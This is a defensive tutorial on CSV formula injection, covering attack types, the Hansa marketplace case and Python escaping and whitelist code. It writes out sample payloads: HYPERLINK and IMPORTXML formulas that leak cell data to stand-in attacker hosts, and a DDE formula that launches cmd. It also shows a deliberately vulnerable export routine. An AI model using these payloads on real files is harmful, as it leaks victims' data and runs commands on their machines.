Online attacks are more frequent than ever, and this trend is likely to continue growing. In this article, we analyze CSV injection attacks and how to defend against them.
Requirements:
- Domain – A domain to perform the tests
- Programming – Very high level of programming knowledge
Responsibility:
In this tutorial, we will use hacking techniques for educational purposes only. We do not promote their use for profit or improper purposes. We are not responsible for any damage or harm that may be caused to the systems used. The user of this tutorial is solely responsible.
Knowledge:
- Linux – High
- Programming – Very High
- Kali Linux – Not applicable
- Windows – Not applicable
- Networking – High
Overall Tutorial Level: Very High
Ideal for: Programmers, Code Security Analysts
Comma-separated value files, or CSV files, are practically everywhere these days. If you work in an office environment (actually, do people still do that?), you have most likely sent, received, and opened CSV files in Microsoft Excel or Google Sheets at one time or another. CSV files allow us to structure complex data sets in a human-readable format.
But CSV files, despite their practicality, also represent a serious attack vector in the form of CSV injection attacks. CSV injection attacks, also known as formula injection attacks, can occur when a website or web application allows users to export data to a CSV file without validating its content. Without validation, the exported CSV file could contain maliciously crafted formulas. If a malicious formula is executed by CSV applications, such as Microsoft Excel, Apple Numbers, or Google Sheets, among others, it could compromise your data, your system, or both.
Another way to use CSV files as an attack vector is to embed malicious links within the file. If a user clicks on the malicious link, all sorts of bad things can happen.
What are CSV files?
You have most likely opened a CSV file at some point. If you have ever used Microsoft Excel, you have played with CSV files.
A comma-separated values (CSV) file is simply a plain text file that contains data. CSV files are often used to exchange data, typically database exports, between different applications.
CSV files are sometimes referred to as character-separated values or comma-delimited files. The comma character is used to separate (or delimit) the different data points. Other characters, such as semicolons, are also sometimes used for delimiting, although commas are the most common. The advantage of using CSV files is that you can export complex data from one application to a CSV file and import it into another application. Once the file is open in a spreadsheet application, you can also perform operations on the data using formulas or macros.

For example, the image from the spreadsheet above looks like this in .csv format when opened in a text editor:

Note that each value is separated by a comma, hence the name Comma Separated Values (CSV).
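To make the format concrete, here is a minimal Python sketch that writes a small table with the standard csv module and prints the resulting plain text. The column names and values are made up for illustration and are not the contents of the article's spreadsheet.

```python
import csv
import io

# Hypothetical sample data; not the spreadsheet shown in the article.
rows = [
    ["name", "income", "expenses"],
    ["Alice", 1200, 800],
    ["Bob", 950, 1000],
]

def to_csv_text(table):
    """Serialize a list of rows to CSV text, using commas as delimiters."""
    buffer = io.StringIO()
    writer = csv.writer(buffer, lineterminator="\n")
    writer.writerows(table)
    return buffer.getvalue()

csv_text = to_csv_text(rows)
print(csv_text)
```

Each row becomes one line of text, and each value within the row is separated from the next by a comma.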
Types of CSV injection attacks
Malicious links
Why are CSV files dangerous? Well, there are three ways in which they are dangerous. The first way CSV files can be used to perpetrate an attack is actually shared by any digital file that displays text and supports hyperlinks. It is simply by embedding a malicious link in one of the cells. If an unsuspecting user clicks on the malicious link, they may have compromised their system, their data, or both. This attack vector can be mitigated with a little common sense: don’t click on links in untrusted files (CSV or otherwise). Microsoft Excel will ask for user confirmation before following the link, but most people expect to find links embedded in trusted CSV files and will ignore the security warning.
Such a link might look like this:
=HYPERLINK("http://ReallyEvilSite.com?leak="&A1&" "&B1, "Click for more")
This would funnel the information contained in the CSV file to the attacker’s server upon clicking.
CSV applications
But there is another, much more common attack vector with CSV files: CSV applications themselves. To render the spreadsheet with the correct values, CSV applications execute all formulas just before the spreadsheet is displayed. This means that no user interaction is required for formulas or macros to run. Therefore, if a malicious formula was embedded in the spreadsheet, all that needs to happen for it to execute automatically is for an unsuspecting user to open the compromised CSV file.
Formulas or macros are essentially equations that are evaluated over the data points contained in the file. Let’s say, for example, that you have a simple spreadsheet with two columns: column A lists your weekly income, and column B lists your weekly expenses. You could use a formula to subtract the expenses from the income and list the result in a third column (C). Such a formula would look like this: =A1-B1. When a spreadsheet application opens a CSV file, it treats a cell as a formula if the cell begins with one of the following characters: Equal (=), Plus (+), Minus (-), At (@).
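The four trigger characters can be checked with a few lines of Python. This is only a sketch: the names FORMULA_PREFIXES and looks_like_formula are hypothetical, and the check covers only the four characters listed in this article.

```python
# The four characters this article lists as formula triggers.
FORMULA_PREFIXES = ("=", "+", "-", "@")

def looks_like_formula(cell: str) -> bool:
    """Return True if the cell starts with one of the formula trigger characters."""
    return cell.startswith(FORMULA_PREFIXES)

print(looks_like_formula("=A1-B1"))  # a real formula
print(looks_like_formula("1200"))    # plain data
print(looks_like_formula("-5"))      # a negative number is flagged too
```

Note that a simple prefix check also flags harmless values such as negative numbers, so it is better suited to deciding which cells need escaping than to rejecting input outright.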
The following example is a malicious formula that would silently funnel the contents of a Google Sheets document to a server controlled by the attacker:
=IMPORTXML(CONCAT("http://evilsite.com?leak=", CONCATENATE(A2:B2)), "//a")
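How does a formula like this end up in an exported file in the first place? The following Python sketch shows a deliberately vulnerable export routine that copies user-supplied text into a CSV file without any validation. The function name export_unsafe, the record fields, and the user "mallory" are hypothetical and only serve to illustrate the idea.

```python
import csv
import io

def export_unsafe(records):
    """Export records to CSV text WITHOUT validation (vulnerable on purpose)."""
    buffer = io.StringIO()
    writer = csv.writer(buffer, lineterminator="\n")
    writer.writerow(["user", "comment"])
    for record in records:
        # Untrusted text is written as-is, so a formula survives the export.
        writer.writerow([record["user"], record["comment"]])
    return buffer.getvalue()

# Hypothetical records; the second comment is attacker-controlled input.
records = [
    {"user": "alice", "comment": "Great product"},
    {"user": "mallory",
     "comment": '=HYPERLINK("http://ReallyEvilSite.com","Click for more")'},
]

unsafe_csv = export_unsafe(records)
print(unsafe_csv)
```

In the raw file, the csv module wraps the malicious field in double quotes and doubles the quotes inside it, which is standard CSV quoting. A spreadsheet application undoes that quoting when it opens the file, so the cell still starts with = and is evaluated as a formula.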
Dynamic Data Exchange
The third CSV attack is unique to Windows computers. Microsoft implemented a feature in Excel called Dynamic Data Exchange (DDE). DDE allows Excel to talk to other parts of the system and even launch applications. Therefore, using DDE, a malicious attacker could craft a malicious formula to launch the command prompt and execute arbitrary code on the machine in question. This could also be crafted as a link. In this case, as in the previous one, a Windows pop-up window appears asking the user if they trust the link. The user must click “Yes” to follow the link. Although this is intended as a CSV attack mitigation measure, most users expect their spreadsheets to interact with their computer, at least in an office environment.
Below is an example of using DDE to launch the command prompt and start pinging a remote computer, which could contribute to a DDoS attack (more victims would be needed, of course).
=cmd|'/C ping -t 172.0.0.1 -l 25152'!'A1'
Social engineering
Like many other online attacks, CSV injection attacks involve some form of social engineering to get the victim to open the CSV file, or to open it and click on a malicious link. The lure could be an email, a Facebook post, or anything else. Be wary of random links.
Example of a CSV injection attack
In June 2017, Dutch police took control of the dark web marketplace Hansa and then used a CSV injection attack against its users.
The Hansa marketplace sold drugs via the dark web (Tor). Marketplace users could download a text file containing a list of their recent purchases. When Dutch police took control of the site on June 20, 2017, they modified the web server code and replaced the “recent purchases” text file with a CSV file. The CSV file contained a malicious payload that would send users’ IP addresses to a server controlled by Dutch police. Sixty-four sellers took the bait. And during the time the server was under the control of the Dutch police, the operation accumulated 27,000 drug transactions in 27 days.
How to mitigate CSV injection attacks
The way to mitigate these types of attacks is actually quite simple. Its implementation only varies depending on your scenario.
There are two scenarios:
- Your website/application produces CSV files
- Your website/application consumes CSV files
Your website/application produces CSV files
If your application produces CSV files, you can perform whitelist validation on the untrusted input and make sure the characters Equal (=), Plus (+), Minus (-), and At (@) are not on the whitelist. Whitelist validation simply means defining a list of allowed characters and comparing the input against it. Any character not on the whitelist is rejected or removed. This is probably the most secure method. However, it assumes that your website/application does not need to allow these characters to perform its functions.
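A minimal sketch of whitelist validation in Python follows. The allowed character set (letters, digits, spaces, periods, commas, and underscores) is an assumption chosen for illustration, and the names NOT_ALLOWED and whitelist_clean are hypothetical. A real application would define the whitelist based on what its fields legitimately need.

```python
import re

# Assumed whitelist: letters, digits, space, period, comma, underscore.
# The pattern matches every character that is NOT on the whitelist.
NOT_ALLOWED = re.compile(r"[^A-Za-z0-9 .,_]")

def whitelist_clean(value: str) -> str:
    """Remove every character that is not on the whitelist."""
    return NOT_ALLOWED.sub("", value)

print(whitelist_clean("Alice Smith"))
print(whitelist_clean("=cmd|'/C calc'!A1"))
```

Because =, +, -, and @ are not on the whitelist, they are stripped along with any other unexpected character, so the cleaned value can no longer start with a formula trigger.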
If you need to accept those characters, you can encode the cell values so that the CSV application does not treat them as formulas: prefix any cell value that begins with =, +, -, or @ with a single quote ('). This method is called “escaping” the characters and ensures that the cell is interpreted as data and not as a formula.
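The escaping approach can be sketched in Python as follows. The names escape_cell and export_escaped are hypothetical, and the sketch handles only the four characters named in this article.

```python
import csv
import io

FORMULA_PREFIXES = ("=", "+", "-", "@")

def escape_cell(value: str) -> str:
    """Prefix a single quote if the value starts with a formula trigger."""
    if value.startswith(FORMULA_PREFIXES):
        return "'" + value
    return value

def export_escaped(rows):
    """Write rows to CSV text, escaping every cell on the way out."""
    buffer = io.StringIO()
    writer = csv.writer(buffer, lineterminator="\n")
    for row in rows:
        writer.writerow([escape_cell(str(cell)) for cell in row])
    return buffer.getvalue()

escaped_csv = export_escaped([["alice", "hello"], ["mallory", "=A1-B1"]])
print(escaped_csv)
```

Cells that do not start with a trigger character pass through unchanged, so ordinary data is not affected.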
Your website/application consumes CSV files
If your website or application ingests CSV files produced elsewhere, you will need to validate and encode the file’s content before it is processed by your application. The exact way to achieve this depends on your site’s architecture and is therefore beyond the scope of this article.
However, many online articles on CSV injection mitigation recommend only validating and encoding cells that contain the offending characters (=, +, -, and @). I would recommend encoding all cells, not just those containing: =, +, -, or @. All data will still be interpretable by the application, and you can be sure that none of the cells will be interpreted as a formula.
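As a rough illustration of encoding every cell, the Python sketch below parses incoming CSV text and prefixes each cell with a single quote. It assumes that "encoding" means the single-quote escaping described earlier in this article, and the name encode_all_cells is hypothetical. Whether to keep or strip the quote again depends on what your application does with the data afterwards.

```python
import csv
import io

def encode_all_cells(csv_text: str):
    """Parse CSV text and prefix every cell with a single quote."""
    reader = csv.reader(io.StringIO(csv_text))
    return [["'" + cell for cell in row] for row in reader]

# Hypothetical incoming file with one malicious cell.
incoming = "name,total\nmallory,=1+1\n"
for row in encode_all_cells(incoming):
    print(row)
```

Since no cell can start with =, +, -, or @ after this step, there is no need to decide case by case which cells are dangerous.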
Conclusion
CSV injection can have really nasty consequences. Fortunately, protecting your website/application is not difficult. Simply do not allow characters that are interpreted as formulas by CSV applications, or validate and encode CSV input.
But since this attack requires some form of social engineering to carry out, as a user, there are some common-sense measures you can take to reduce your chances of becoming a victim.
- Use a firewall: All major operating systems have a built-in inbound firewall, and most consumer routers have a built-in NAT firewall. Make sure they are enabled, as they can help protect you if you click on a malicious link.
- If your CSV application displays a warning about a link you are trying to access, you should pay attention and inspect the link carefully.
- Do not click on email attachments unless you know exactly who sent them and what they are.
I hope you enjoyed this content.